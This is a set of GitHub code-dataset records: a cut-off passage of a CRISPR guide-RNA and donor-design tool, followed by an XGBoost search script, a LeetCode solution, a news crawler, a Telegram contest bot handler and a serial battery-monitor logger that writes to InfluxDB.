range(0, min([gRNA_num_out, ranked_df_gRNAs_ATG.shape[0]])):\n # if best_start_gRNA.shape[0] > 1: # multiple best scoring gRNA\n # best_start_gRNA = best_start_gRNA[best_start_gRNA[\"CSS\"] == best_start_gRNA[\"CSS\"].max()] # break the tie by CSS score\n # best_start_gRNA = best_start_gRNA.head(1) #get the first row in case of ties\n current_gRNA = ranked_df_gRNAs_ATG.iloc[[i]]\n\n # get HDR template\n try:\n HDR_template = get_HDR_template(\n df=current_gRNA,\n ENST_info=ENST_info,\n type=\"start\",\n ENST_PhaseInCodon=ENST_PhaseInCodon,\n loc2posType=loc2posType,\n genome_ver=config[\"genome_ver\"],\n HDR_arm_len=HDR_arm_len,\n tag=config[\"Npayload\"],\n ssODN_max_size=ssODN_max_size,\n Donor_type=config[\"Donor_type\"],\n Strand_choice=config[\"Strand_choice\"],\n recoding_args=recoding_args,\n syn_check_args=syn_check_args,\n )\n except Exception as e:\n print(\"Unexpected error:\", str(sys.exc_info()))\n traceback.print_exc()\n print(\"additional information:\", e)\n PrintException()\n\n # append the best gRNA to the final df\n if i == 0:\n best_start_gRNAs = pd.concat([best_start_gRNAs, current_gRNA])\n\n # append cfd score to list for plotting\n pre_recoding_cfd_score = HDR_template.pre_recoding_cfd_score\n cfd1 = \"\"\n if hasattr(HDR_template, \"cfd_score_post_mut_ins\"):\n cfd1 = HDR_template.cfd_score_post_mut_ins\n if not hasattr(HDR_template, \"cfd_score_post_mut2\"):\n cfd2 = cfd1\n else:\n cfd2 = HDR_template.cfd_score_post_mut2\n if not hasattr(HDR_template, \"cfd_score_post_mut3\"):\n cfd3 = cfd2\n else:\n cfd3 = HDR_template.cfd_score_post_mut3\n if not hasattr(HDR_template, \"cfd_score_post_mut4\"):\n cfd4 = cfd3\n else:\n cfd4 = HDR_template.cfd_score_post_mut4\n cfd_scan = 0\n cfd_scan_no_recode = 0\n if hasattr(HDR_template, \"cfd_score_highest_in_win_scan\"):\n cfd_scan = HDR_template.cfd_score_highest_in_win_scan\n cfd_scan_no_recode = HDR_template.scan_highest_cfd_no_recode\n\n cfdfinal = HDR_template.final_cfd\n\n strands = f\"{HDR_template.ENST_strand}/{HDR_template.gStrand}/{HDR_template.Donor_strand}\"\n\n # write csv\n (\n spec_score,\n seq,\n pam,\n s,\n e,\n cut2ins_dist,\n spec_weight,\n dist_weight,\n pos_weight,\n final_weight,\n ) = get_res(current_gRNA, spec_score_flavor)\n\n donor = HDR_template.Donor_final\n donor_trimmed = \"N/A for ssODN\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed = HDR_template.Donor_final\n donor = HDR_template.Donor_pretrim\n \n # gRNA and donor names\n ENST_design_counts[ENST_ID] = ENST_design_counts.get(ENST_ID, 0) + 1\n gRNA_name = f\"{ENST_ID}_gRNA_{ENST_design_counts[ENST_ID]}\"\n donor_name = f\"{ENST_ID}_donor_{ENST_design_counts[ENST_ID]}\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed_name = f\"{ENST_ID}_donor_trimmed_{ENST_design_counts[ENST_ID]}\"\n else:\n donor_trimmed_name = \"N/A for ssODN\"\n\n gRNA_cut_pos = (\n HDR_template.CutPos\n ) # InsPos is the first letter of stop codon \"T\"AA or the last letter of the start codon AT\"G\"\n insert_pos = HDR_template.InsPos\n if config[\"recoding_off\"]:\n csvout_N.write(\n f\",{cfd1},{cfd2},{cfd3},{cfd4},{cfd_scan},{cfd_scan_no_recode},{cfdfinal}\\n\"\n )\n csvout_res.write(\n f\"{Entry},{row_prefix},N,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},recoding turned off,,{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write(f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n else:\n csvout_N.write(\n f\",{cfd1},{cfd2},{cfd3},{cfd4},{cfd_scan},{cfd_scan_no_recode},{cfdfinal}\\n\"\n )\n if not isinstance(cfd4, float):\n cfd4 = \"\"\n csvout_res.write(\n f\"{Entry},{row_prefix},N,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},{ret_six_dec(cfd4)},{ret_six_dec(cfd_scan)},{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write(f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n\n # write log\n this_log = f\"{HDR_template.info}{HDR_template.info_arm}{HDR_template.info_p1}{HDR_template.info_p2}{HDR_template.info_p3}{HDR_template.info_p4}{HDR_template.info_p5}{HDR_template.info_p6}\\n--------------------final CFD:{ret_six_dec(HDR_template.final_cfd)}\\n donor before any recoding:{HDR_template.Donor_vanillia}\\n donor after all recoding:{HDR_template.Donor_postMut}\\ndonor centered(if applicable):{HDR_template.Donor_final}\\n donor (best strand):{HDR_template.Donor_final}\\n\\n\"\n recut_CFD_all.write(this_log)\n if HDR_template.final_cfd > 0.03:\n recut_CFD_fail.write(this_log)\n\n if hasattr(HDR_template, \"info_phase4_5UTR\"):\n fiveUTR_log.write(\n f\"phase4_UTR\\t{HDR_template.info_phase4_5UTR[0]}\\t{HDR_template.info_phase4_5UTR[1]}\\n\"\n )\n if hasattr(HDR_template, \"info_phase5_5UTR\"):\n fiveUTR_log.write(\n f\"phase5_UTR\\t{HDR_template.info_phase5_5UTR[0]}\\t{HDR_template.info_phase5_5UTR[1]}\\n\"\n )\n\n ##################################\n # best stop gRNA and HDR template#\n ##################################\n if ENST_based == True and (target_terminus == \"ALL\" or target_terminus == \"C\"):\n if not ENST_in_db:\n Entry += 1\n csvout_C.write(ENST_ID)\n\n # get gRNAs\n ranked_df_gRNAs_ATG, ranked_df_gRNAs_stop = get_gRNAs(\n ENST_ID=ENST_ID,\n ENST_info=ENST_info,\n freq_dict=freq_dict,\n loc2file_index=loc2file_index,\n loc2posType=loc2posType,\n dist=max_cut2ins_dist,\n genome_ver=config[\"genome_ver\"],\n spec_score_flavor=spec_score_flavor,\n reg_penalty=reg_penalty,\n )\n\n if ranked_df_gRNAs_stop.empty == True:\n stop_info.failed.append(ENST_ID)\n csvout_C.write(\",,,,,\\n\")\n csvout_res.write(f\"{Entry},{ENST_ID},ERROR: no suitable gRNAs found\\n\")\n\n for i in range(0, min([gRNA_num_out, ranked_df_gRNAs_stop.shape[0]])):\n # if best_stop_gRNA.shape[0] > 1: # multiple best scoring gRNA\n # best_stop_gRNA = best_stop_gRNA[best_stop_gRNA[\"CSS\"] == best_stop_gRNA[\"CSS\"].max()] # break the tie by CSS score\n # best_stop_gRNA = best_stop_gRNA.head(1) #get the first row in case of ties\n current_gRNA = ranked_df_gRNAs_stop.iloc[[i]]\n\n # get HDR template\n try:\n HDR_template = get_HDR_template(\n df=current_gRNA,\n ENST_info=ENST_info,\n type=\"stop\",\n ENST_PhaseInCodon=ENST_PhaseInCodon,\n loc2posType=loc2posType,\n HDR_arm_len=HDR_arm_len,\n genome_ver=config[\"genome_ver\"],\n tag=config[\"Cpayload\"],\n Donor_type=config[\"Donor_type\"],\n Strand_choice=config[\"Strand_choice\"],\n ssODN_max_size=ssODN_max_size,\n recoding_args=recoding_args,\n syn_check_args=syn_check_args,\n )\n except Exception as e:\n print(\"Unexpected error:\", str(sys.exc_info()))\n traceback.print_exc()\n print(\"additional information:\", e)\n PrintException()\n\n # append the best gRNA to the final df\n best_stop_gRNAs = pd.concat([best_stop_gRNAs, current_gRNA])\n\n # append cfd score to list for plotting\n pre_recoding_cfd_score = HDR_template.pre_recoding_cfd_score\n cfd1 = \"\"\n if hasattr(HDR_template, \"cfd_score_post_mut_ins\"):\n cfd1 = HDR_template.cfd_score_post_mut_ins\n if not hasattr(HDR_template, \"cfd_score_post_mut2\"):\n cfd2 = cfd1\n else:\n cfd2 = HDR_template.cfd_score_post_mut2\n if not hasattr(HDR_template, \"cfd_score_post_mut3\"):\n cfd3 = cfd2\n else:\n cfd3 = HDR_template.cfd_score_post_mut3\n if not hasattr(HDR_template, \"cfd_score_post_mut4\"):\n cfd4 = cfd3\n else:\n cfd4 = HDR_template.cfd_score_post_mut4\n\n cfd_scan = 0\n cfd_scan_no_recode = 0\n if hasattr(HDR_template, \"cfd_score_highest_in_win_scan\"):\n cfd_scan = HDR_template.cfd_score_highest_in_win_scan\n cfd_scan_no_recode = HDR_template.scan_highest_cfd_no_recode\n\n cfdfinal = HDR_template.final_cfd\n\n strands = f\"{HDR_template.ENST_strand}/{HDR_template.gStrand}/{HDR_template.Donor_strand}\"\n\n # write csv\n (\n spec_score,\n seq,\n pam,\n s,\n e,\n cut2ins_dist,\n spec_weight,\n dist_weight,\n pos_weight,\n final_weight,\n ) = get_res(current_gRNA, spec_score_flavor)\n\n donor = HDR_template.Donor_final\n donor_trimmed = \"N/A for ssODN\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed = HDR_template.Donor_final\n donor = HDR_template.Donor_pretrim\n \n # gRNA and donor names\n ENST_design_counts[ENST_ID] = ENST_design_counts.get(ENST_ID, 0) + 1\n gRNA_name = f\"{ENST_ID}_gRNA_{ENST_design_counts[ENST_ID]}\"\n donor_name = f\"{ENST_ID}_donor_{ENST_design_counts[ENST_ID]}\"\n if config[\"Donor_type\"] == \"dsDNA\":\n donor_trimmed_name = f\"{ENST_ID}_donor_trimmed_{ENST_design_counts[ENST_ID]}\"\n else:\n donor_trimmed_name = \"N/A for ssODN\"\n\n gRNA_cut_pos = (\n HDR_template.CutPos\n ) # InsPos is the first letter of stop codon \"T\"AA or the last letter of the start codon AT\"G\"\n insert_pos = HDR_template.InsPos\n if config[\"recoding_off\"]:\n csvout_C.write(\n f\",{cfd1},{cfd2},{cfd3},{cfd4},{cfd_scan},{cfd_scan_no_recode},{cfdfinal}\\n\"\n )\n csvout_res.write(\n f\"{Entry},{row_prefix},C,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},recoding turned off,,{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write( f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n else:\n csvout_C.write(\n f\",{cfd1},{cfd2},{cfd3},{cfd4},{cfd_scan},{cfd_scan_no_recode},{cfdfinal}\\n\"\n )\n if not isinstance(cfd4, float):\n cfd4 = \"\"\n csvout_res.write(\n f\"{Entry},{row_prefix},C,{gRNA_name},{seq},{pam},{s},{e},{gRNA_cut_pos},{insert_pos},{cut2ins_dist},{spec_score},{ret_six_dec(spec_weight)},{ret_six_dec(dist_weight)},{ret_six_dec(pos_weight)},{ret_six_dec(final_weight)},{ret_six_dec(pre_recoding_cfd_score)},{ret_six_dec(cfd4)},{ret_six_dec(cfd_scan)},{ret_six_dec(cfdfinal)},{donor_name},{donor},{donor_trimmed_name},{donor_trimmed},{HDR_template.effective_HA_len},{HDR_template.synFlags},{HDR_template.cutPos2nearestOffLimitJunc},{strands}\\n\"\n )\n csvout_res2.write(f\"{Entry},\"+\n config[\"genome_ver\"]\n + f\",{HDR_template.ENST_chr},{insert_pos},{ENST_ID},{name}\\n\"\n )\n\n # write log\n this_log = f\"{HDR_template.info}{HDR_template.info_arm}{HDR_template.info_p1}{HDR_template.info_p2}{HDR_template.info_p3}{HDR_template.info_p4}{HDR_template.info_p5}{HDR_template.info_p6}\\n--------------------final CFD:{ret_six_dec(HDR_template.final_cfd)}\\n donor before any recoding:{HDR_template.Donor_vanillia}\\n donor after all recoding:{HDR_template.Donor_postMut}\\n donor centered:{HDR_template.Donor_final}\\ndonor centered (best strand):{HDR_template.Donor_final}\\n\\n\"\n recut_CFD_all.write(this_log)\n if HDR_template.final_cfd > 0.03:\n recut_CFD_fail.write(this_log)\n\n if hasattr(HDR_template, \"info_phase4_5UTR\"):\n fiveUTR_log.write(\n f\"phase4_UTR\\t{HDR_template.info_phase4_5UTR[0]}\\t{HDR_template.info_phase4_5UTR[1]}\\n\"\n )\n if hasattr(HDR_template, \"info_phase5_5UTR\"):\n fiveUTR_log.write(\n f\"phase5_UTR\\t{HDR_template.info_phase5_5UTR[0]}\\t{HDR_template.info_phase5_5UTR[1]}\\n\"\n )\n\n protein_coding_transcripts_count += 1\n # else:\n # log.info(f\"skipping {ENST_ID} transcript type: {transcript_type} b/c transcript is not protein_coding\")\n transcript_count += 1\n # report progress\n if (\n protein_coding_transcripts_count % 100 == 0\n and protein_coding_transcripts_count != 0\n ):\n endtime = datetime.datetime.now()\n elapsed_sec = endtime - starttime\n elapsed_min = elapsed_sec.seconds / 60\n log.info(\n f\"processed {protein_coding_transcripts_count}/{transcript_count} transcripts, elapsed time {elapsed_min:.2f} min ({elapsed_sec} sec)\"\n )\n\n # write csv out\n endtime = datetime.datetime.now()\n elapsed_sec = endtime - starttime\n elapsed_min = elapsed_sec.seconds / 60\n\n if \"num_to_process\" in locals():\n pass\n else:\n num_to_process = \"all\"\n\n log.info(\n f\"finished in {elapsed_min:.2f} min ({elapsed_sec} sec) , processed {protein_coding_transcripts_count}/{transcript_count} transcripts\\nnonprotein-coding transcripts were skipped\\n\"\n f\"results written to {config['outdir']}\"\n )\n\n recut_CFD_all.close()\n recut_CFD_fail.close()\n csvout_N.close()\n csvout_C.close()\n fiveUTR_log.close()\n csvout_res.close()\n csvout_res2.close()\n\n except Exception as e:\n print(\"Unexpected error:\", str(sys.exc_info()))\n traceback.print_exc()\n print(\"additional information:\", e)\n PrintException()\n\n## end of main()\n\ndef ret_six_dec(myvar):\n \"\"\"\n retain six decimal points for printout\n \"\"\"\n if type(myvar) == float:\n return f\"{myvar:.6f}\"\n elif type(myvar) == int:\n myvar = float(myvar)\n return f\"{myvar:.6f}\"\n else:\n return myvar\n\n\ndef mkdir(mypath):\n if not os.path.exists(mypath):\n os.makedirs(mypath)\n\n\ndef deepmerge(dict1, dict2):\n \"\"\"\n merge two dictionary at the secondary key level\n \"\"\"\n if len(dict1) == 0:\n return dict2\n if len(dict2) == 0:\n return dict1\n # start merging\n dictm = dict1\n for k in dict2:\n if k in dict1: # shared key\n for k2 in dict2[k].keys():\n dictm[k][k2] = dict2[k][k2]\n else:\n dictm[k] = dict2[k]\n return dictm\n\n\nclass info:\n \"\"\"\n info log class\n \"\"\"\n def __init__(self) -> None:\n self.cfd1 = []\n self.cfd2 = []\n self.cfd3 = []\n self.cfd4 = []\n self.cfdfinal = []\n self.failed = []\n\n\ndef get_res(best_start_gRNA, spec_score_flavor):\n spec_score = best_start_gRNA[spec_score_flavor].values[0]\n seq = best_start_gRNA[\"seq\"].values[0]\n pam = best_start_gRNA[\"pam\"].values[0]\n s = best_start_gRNA[\"start\"].values[0]\n e = best_start_gRNA[\"end\"].values[0]\n cut2ins_dist = best_start_gRNA[\"Cut2Ins_dist\"].values[0]\n spec_weight = best_start_gRNA[\"spec_weight\"].values[0]\n dist_weight = best_start_gRNA[\"dist_weight\"].values[0]\n pos_weight = best_start_gRNA[\"pos_weight\"].values[0]\n final_weight = best_start_gRNA[\"final_weight\"].values[0]\n return [\n spec_score,\n seq,\n pam,\n s,\n e,\n cut2ins_dist,\n spec_weight,\n dist_weight,\n pos_weight,\n final_weight,\n ]\n\n\ndef test_memory(n):\n \"\"\"\n try allocate n MB of memory\n return true if can, and false otherwise\n \"\"\"\n try:\n x = bytearray(1024 * 1000 * n)\n del x\n return True\n except:\n return False\n\n\ndef PrintException():\n exc_type, exc_obj, tb = sys.exc_info()\n f = tb.tb_frame\n lineno = tb.tb_lineno\n filename = f.f_code.co_filename\n linecache.checkcache(filename)\n line = linecache.getline(filename, lineno, f.f_globals)\n print(\n 'EXCEPTION IN ({}, LINE {} \"{}\"): {}'.format(\n filename, lineno, line.strip(), exc_obj\n )\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"czbiohub-sf/protoSpaceJAM","sub_path":"protoSpaceJAM/protoSpaceJAM.py","file_name":"protoSpaceJAM.py","file_ext":"py","file_size_in_byte":55991,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"34642030460","text":"####################################################\n#\n# XGBoost Model\n#\n# Mike Bernico CS570 10/12/2016\n#\n####################################################\n\n\nimport numpy as np\nimport pandas as pd\nimport xgboost\nfrom sklearn.grid_search import RandomizedSearchCV\n\n\ndef create_search():\n xgb = xgboost.XGBClassifier(nthread=6, n_estimators=300)\n hyperparameters = {'colsample_bytree': [.3, .4, .5, 1], 'max_depth': [10, 12, 14, 16],\n 'learning_rate': np.arange(0.01, 0.4, .1)}\n return RandomizedSearchCV(xgb, hyperparameters, cv=3, scoring='roc_auc', n_iter=15)\n\n\ndf = pd.read_csv(\"./data/boruta_filtered_train.csv\")\ny = df['y']\nX = df.drop(['y'], axis=1)\n\nprint(\"Fitting RandomizedSearch. Please Wait (awhile)...\")\nsearch = create_search()\nsearch.fit(X, y)\nprint(\"Done!\")\nprint(\"Best Parameters: \")\nprint(search.best_params_)\nprint(\"Best Score:\")\nprint(search.best_score_)\n\n# Create Submission\nkaggle_test = pd.read_csv(\"./work_dir/my_midterm_kaggle_submission.csv\")\nselected_features = pd.read_csv(\"./work_dir/feature_support.csv\")\nkaggle_test_selected = kaggle_test.ix[:, selected_features['0'].values] # trim to the boruta features\n\nprediction = pd.DataFrame(search.best_estimator_.predict_proba(kaggle_test_selected)[:, 1])\nprediction.columns = ['y']\nprediction.to_csv(\"xgboost_model_prediction.csv\", index_label=\"Id\")\n\n# {'max_depth': 14, 'learning_rate': 0.11, 'colsample_bytree': 1}\n# Best Score:\n# 0.9808915808045747\n","repo_name":"mbernico/csc570_midterm_stack_model","sub_path":"xgboost_model.py","file_name":"xgboost_model.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19714098657","text":"class Solution:\n def maxProfit(self, prices: 'List[int]') -> 'int':\n n = len(prices)\n if n < 2:\n return 0\n buy = [0 for i in range(n)]\n s1, s2, sell = buy[:], buy[:], buy[:]\n buy[0], s1[0] = -prices[0], -prices[0]\n for i in range(1, n):\n buy[i] = s2[i - 1] - prices[i]\n s1[i] = max(s1[i - 1], buy[i - 1])\n s2[i] = max(s2[i - 1], sell[i - 1])\n sell[i] = max(buy[i - 1], s1[i - 1]) + prices[i]\n return max(sell[n - 1], s2[n - 1])\n\n\nif __name__ == \"__main__\":\n a = Solution()\n print(a.maxProfit([1,2,4]))","repo_name":"isabella0428/Leetcode","sub_path":"python/309.py","file_name":"309.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"70012069203","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nfrom functions import return_keyword\r\nfrom home.models import StockModel\r\nfrom wordcloud import WordCloud\r\nfrom collections import Counter\r\n\r\n\r\ndef Crawling(search_text,start_date,end_date):\r\n titles=[]\r\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36'}\r\n\r\n for i in range(1,201,10):\r\n try:\r\n url_basic = 'https://search.naver.com/search.naver?where=news&sm=tab_pge&query={}&sort=1&photo=0&field=0&pd=3&ds={}&de={}&mynews=0&office_type=0&office_section_code=0&news_office_checked=&nso=so:dd,p:from20210810to20210814,a:all&start={}'.format(search_text,start_date,end_date,i)\r\n\r\n data = requests.get(url_basic, headers=headers)\r\n soup = BeautifulSoup(data.text, 'html.parser')\r\n\r\n news_titles = soup.find_all('a',attrs={'class':'news_tit'})\r\n\r\n for title in news_titles:\r\n titles.append([title['title'], title['href']])\r\n except:\r\n pass\r\n\r\n return titles\r\n","repo_name":"bob8dod/Sejong_Hackathon","sub_path":"news_crawling.py","file_name":"news_crawling.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40293209363","text":"from datetime import datetime, timedelta\nfrom typing import Any\n\nfrom aiogram import Bot, types\nfrom aiogram.exceptions import TelegramBadRequest\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.fsm.state import State, StatesGroup\nfrom babel.dates import format_date, get_month_names\n\nfrom db.db_operations import AdminDB, ObjectFactory\nfrom handlers.internal_logic.admin import i_set_theme\nfrom reminders import add_reminder\nfrom utils.admin_keyboard import AdminKeyboard, CallbackManage\n\n\nclass ContestCreate(StatesGroup):\n name_contest = State()\n are_you_sure = State()\n will_you_post = State()\n thanks_for_info = State()\n\n\nasync def set_theme(\n query: types.CallbackQuery,\n callback_data: CallbackManage,\n state: FSMContext,\n msg: dict,\n):\n if not query.message:\n return\n keyboard: AdminKeyboard = AdminKeyboard.fromcallback(callback_data)\n await query.message.edit_text(\n text=msg[\"contest\"][\"create_greet_contest\"], parse_mode=\"HTML\"\n )\n data = {}\n data[\"group\"] = callback_data.group_id\n data[\"user_id\"] = query.from_user.id\n data[\"msg_id\"] = query.message.message_id\n data[\"keyboard\"] = keyboard\n data[\"file_id\"] = None\n await state.set_data(data)\n await state.set_state(ContestCreate.name_contest)\n\n\nasync def set_theme_accept_message(\n message: types.Message, bot: Bot, state: FSMContext, admin_unit: AdminDB, msg: dict\n):\n if not message.text:\n return\n data_theme_date = message.text.split()\n data: dict[str, Any] = await state.get_data()\n\n if (\n len(data_theme_date) != 1\n or data_theme_date[0].lower() == \"отмена\"\n or data_theme_date[0].lower() == \"cancel\"\n ):\n text = msg[\"contest\"][\"cancel_contest\"]\n keyboard: AdminKeyboard = data[\"keyboard\"]\n await state.clear()\n await bot.edit_message_text(\n text=text,\n chat_id=data[\"user_id\"],\n message_id=data[\"msg_id\"],\n reply_markup=keyboard.keyboard_back,\n )\n else:\n # temporary turn-off time = data_theme_date[1] + data_theme_date[2]\n # time = \"1неделя\"\n time = \"2неделя\"\n theme = ObjectFactory.build_theme_fsm(data_theme_date[0])\n week_to_second: dict[str, int] = {\n \"1неделя\": 604800,\n \"1неделю\": 604800,\n \"2недели\": 1209600,\n \"2неделя\": 1209600,\n \"3неделя\": 1814400,\n \"3недели\": 1814400,\n }\n try:\n date_without_hms = datetime.utcnow().replace(\n hour=6, minute=0, second=0, microsecond=0\n )\n one_day = timedelta(days=1).total_seconds()\n time = int(week_to_second[time] + date_without_hms.timestamp() - one_day)\n try:\n await add_reminder(time, data[\"group\"])\n except Exception as e:\n await message.reply(\"Не удалось установить напоминание\")\n print(e)\n except KeyError:\n await message.reply(msg[\"admin\"][\"wrong_time\"])\n await state.clear()\n return\n\n link = await admin_unit.get_last_results_link(int(data[\"group\"]))\n if link is not None:\n link_msg = f'Результаты предыдущего челленджа вот тут.'\n else:\n link_msg = \"\"\n text = await i_set_theme(theme, admin_unit, int(data[\"group\"]), time)\n\n num = str(await admin_unit.count_contests(int(data[\"group\"])))\n\n # Get the current date\n now = datetime.now()\n end = timedelta(seconds=time) + now\n\n week_parent: dict[int, str] = {\n 0: \"понедельника\",\n 1: \"вторника\",\n 2: \"среды\",\n 3: \"четверга\",\n 4: \"пятницы\",\n 5: \"субботы\",\n 6: \"воскресенья\",\n }\n\n # Get the short and full month names in Russian\n full_month_names = get_month_names(\"wide\", locale=\"ru\")\n\n # Get the day name and format the date\n week = week_parent[end.weekday()]\n date_now = format_date(now.date(), format=\"d\", locale=\"ru\") + \" \" # day number\n date_now += full_month_names[now.month] # month name\n date_str = format_date(end.date(), format=\"d\", locale=\"ru\") + \" \"\n date_str += full_month_names[end.month]\n\n ret_text = (\n msg[\"contest\"][\"start_contest\"].format(\n num=num, theme=theme, date_now=date_now, date_str=date_str, week=week\n )\n + link_msg\n )\n await bot.edit_message_text(\n text=msg[\"contest\"][\"will_you_post\"],\n chat_id=data[\"user_id\"],\n message_id=data[\"msg_id\"],\n parse_mode=\"HTML\",\n )\n data[\"send\"] = await bot.send_message(\n text=ret_text, chat_id=data[\"user_id\"], parse_mode=\"HTML\"\n )\n\n await state.set_data(data)\n await state.set_state(ContestCreate.will_you_post)\n\n\nasync def should_i_post_theme(\n message: types.Message, bot: Bot, state: FSMContext, msg: dict\n):\n data: dict[str, Any] = await state.get_data()\n\n if message.text and (message.text.lower() == \"ок\" or message.text.lower() == \"ok\"):\n message_to_pin = await bot.copy_message(\n chat_id=data[\"group\"],\n from_chat_id=data[\"user_id\"],\n message_id=data[\"send\"].message_id,\n )\n\n try:\n await bot.pin_chat_message(\n chat_id=data[\"group\"], message_id=message_to_pin.message_id\n )\n except TelegramBadRequest:\n await bot.send_message(chat_id=data[\"group\"], text=msg[\"contest\"][\"err\"])\n await state.clear()\n return\n else:\n data[\"send\"] = await message.copy_to(chat_id=data[\"user_id\"], parse_mode=\"HTML\")\n\n await state.set_data(data)\n await state.set_state(ContestCreate.will_you_post)\n","repo_name":"vlle/Photoshnaya","sub_path":"app/handlers/contest_fsm.py","file_name":"contest_fsm.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"39204119828","text":"\nimport re\n\ndef reader(filename):\n with open(filename,\"r\") as file:\n line = file.readlines()\n data = [re.split(r'[[\\]]',l.strip()) for l in line]\n return data\n \n\nnumber = reader(\"18_input.txt\")\na = 0\n\n\n","repo_name":"MaazJamal/AOC2021","sub_path":"18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35230618691","text":"\n#!/usr/bin/env python\n\n\n\"\"\"\n 2020-05-26\n\n Created 22 April 2007\n By David A. Mellis \n modified 2020-05-26\n by David Buron\n \n This example code is in the public domain.\n \n\"\"\"\n\nimport os\nimport sys\nimport time\nimport serial\nfrom influxdb import InfluxDBClient\n\n# p - location of the data in the string, starting at 0!\n# s - size of the data (for example, SOC is 2)\n# d - the name of the variable in this case var sbms\ndef dcmp(p, s, d):\n\n xx = 0;\n\n for z in range(s):\n# Java script: xx = xx + ((d.charCodeAt((p + s - 1) -z) -35) * Math.pow(91, z$))\n wanted_ascii_character = ord(chr(d[(p + s - 1) - z]))\n xx = xx + ((wanted_ascii_character - 35) * pow(91, z))\n\n return xx\n\n#Connect to local InfluxDB and Database\nclient = InfluxDBClient(host='localhost', port=8086)\nclient.switch_database('SBMS')\n\nvar_sbms = ''\n\n# Receiving Data\nwhile True:\n\tx=os.path.exists('/dev/ttyUSB0')\n#Open Serial connection from USB, SBMS0 must be set to same BAUD rate\n\tif(x==1):\n\t\tser = serial.Serial('/dev/ttyUSB0', 115200)\n\t\tdata = ser.readline()\n\t\tif not data:\n\t\t\tbreak\n\t\tvar_sbms = data\n\n\n\t#Debug output from SBMS0\n\t#\tprint(var_sbms)\n\t#\tprint(str(dcmp(0, 27, var_sbms)) + str(var_sbms[28]) + str(dcmp(29, len(var_sbms)-29, var_sbms)))\n\n\t# process the SBMS data\n\t\tSOC = float(dcmp(6, 2, var_sbms))\n\t# print('PV SOC = ' + str(SOC) + '%')\n\n\t# one of cell voltage has to be cast to a float\n\t\tCell1 = float(dcmp(8, 2, var_sbms)) / 1000\n\t# print('Cell1 = ' + str(Cell1) + '\\n')\n\n\t\tCell2 = float(dcmp(10, 2, var_sbms)) / 1000\n\t# print('Cell2 = ' + str(Cell2) + '\\n')\n\n\t\tCell3 = float(dcmp(12, 2, var_sbms)) / 1000\n\t# print('Cell3 = ' + str(Cell3) + '\\n')\n\n\t\tCell4 = float(dcmp(14, 2, var_sbms)) / 1000\n\t# print('Cell4 = ' + str(Cell4) + '\\n')\n\n\t\tCell5 = float(dcmp(16, 2, var_sbms)) / 1000\n\t# print('Cell5 = ' + str(Cell5) + '\\n')\n\n\t\tCell6 = float(dcmp(18, 2, var_sbms)) / 1000\n\t# print('Cell6 = ' + str(Cell6) + '\\n')\n\n\t\tCell7 = float(dcmp(20, 2, var_sbms)) / 1000\n\t# print('Cell7 = ' + str(Cell7) + '\\n')\n\n\t\tCell8 = float(dcmp(22, 2, var_sbms)) / 1000\n\t# print('Cell8 = ' + str(Cell8) + '\\n')\n\n\t# Converted based on documentation: 0 to 1449 = -45C to 99.9C\n\t# Converting to fahrenheit\n\t\tInternal_temp = float((dcmp(24, 2, var_sbms)-450)/10*9/5+32)\n\t\tInternal_temp = round(Internal_temp,3)\n\t# print('Internal temp = ' + str(Internal_temp) + '\\n')\n\n\t# Converted based on documentation: 0 to 1449 = -45C 